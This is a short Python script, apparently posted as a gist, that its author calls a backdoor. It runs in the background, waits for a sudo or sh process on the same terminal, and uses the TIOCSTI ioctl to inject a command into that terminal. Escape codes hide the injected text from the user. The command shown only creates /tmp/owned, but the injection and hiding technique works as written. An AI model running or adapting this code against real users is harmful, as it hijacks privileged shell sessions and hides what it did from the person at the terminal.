A bad background task that will inject stuff into shells.

badbackground.py

#!/usr/bin/env python3
"""
So... I got nerd snipped by someone talking about a fake bug.

But in the process I got to learn a bit about an old trick and convert it into
a mildly interesting backdoor that lets you misuse a sudo session if started
from one the basic user you owned.

Run like:
    python3 this.py &
    
Then run `sh` and the command will be injected into it.

I implemented some broken line removal, you can do a better job.

This is NOT a security issue, we ain't breaking any real security boundaries.
Do not claim it as one.

- bah
"""
import time
import os
import psutil
import fcntl
import termios


WANT_TO_HIJACK = ['sudo', 'sh']
COMMAND = '\ntouch /tmp/owned\n'


def is_priv_process_running():
    our_pty = [os.ttyname(0), os.ttyname(1), os.ttyname(2)]
    for process in psutil.process_iter():
        if process.name() not in WANT_TO_HIJACK:
            continue
        if process.terminal() not in our_pty:
            continue
        return process.terminal()

    return None


def send_command(fd, command):
    for c in command:
        fcntl.ioctl(fd, termios.TIOCSTI, c)


def try_hijack(pty):
    fd = os.open(pty, os.O_RDWR)
    send_command(fd, COMMAND)
    print('\033[2A\n' + ' ' * 32)


def main():
    # hiding the deletion, has some annoying side effects
    print('\033[2A\n' + ' ' * 32)
    send_command(0, '\n')
    while True:
        pty = is_priv_process_running()
        if pty:
            try_hijack(pty)
            time.sleep(10)
            break
        time.sleep(1)


if __name__ == "__main__":
    main()